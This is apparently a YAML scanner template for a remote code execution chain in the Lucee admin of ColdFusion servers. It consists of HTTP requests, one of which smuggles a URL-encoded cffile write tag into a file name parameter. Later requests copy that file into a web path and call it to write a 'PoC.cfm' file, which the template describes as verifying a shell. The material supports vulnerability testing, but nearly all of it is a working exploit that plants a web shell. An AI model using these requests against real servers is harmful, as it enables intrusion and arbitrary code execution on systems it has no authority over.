id: coldfusion-lucee-rce
single: true
level: 2
info:
  name: Adobe ColdFusion Lucee RCE
  risk: High

params:
  - root: "{{.BaseURL}}"

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/lucee/admin/imgProcess.cfm?file=filename.cfm
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      imgSrc=sample
    conclusions:
      - SetValue("isLucee", StatusCode() == 200 && StringSearch('resHeaders', 'cfid') && ContentLength('body') <= 10)

  # only do confirmed if this is Tableau
  - conditions:
      - ValueOf("isLucee") == "true"
    method: POST
    redirect: false
    url: >-
      {{.root}}/lucee/admin/imgProcess.cfm?file=%2F%73%65%72%76%65%72%2e%3c%63%66%66%69%6c%65%20%61%63%74%69%6f%6e%3d%77%72%69%74%65%20%66%69%6c%65%3d%23%55%72%6c%5b%27%66%27%5d%23%20%6f%75%74%70%75%74%3d%23%55%72%6c%5b%27%63%6f%6e%74%65%6e%74%27%5d%23%3e%2e%63%66%6d
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      imgSrc="#stText.Buttons.save#"
    detections:
      - >-
        StatusCode() == 200 && ContentLength('body') <= 10

  - conditions:
      - ValueOf("isLucee") == "true"
    method: GET
    redirect: false
    url: >-
      {{.root}}/lucee/admin/admin.search.index.cfm?dataDir=/opt/lucee/tomcat/webapps/ROOT/WEB-INF/lucee/context/rootxharsh/&LUCEEARCHIVEZIPPATH=/opt/lucee/tomcat/webapps/ROOT/WEB-INF/lucee/temp/admin-ext-thumbnails/__/
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200

  # verify a shell
  - conditions:
      - ValueOf("isLucee") == "true"
    method: GET
    redirect: false
    url: >-
      {{.root}}/lucee/rootxharsh/searchindex.cfm?f=PoC.cfm&content=cfm_shell
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200


reference:
  - links:
      - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md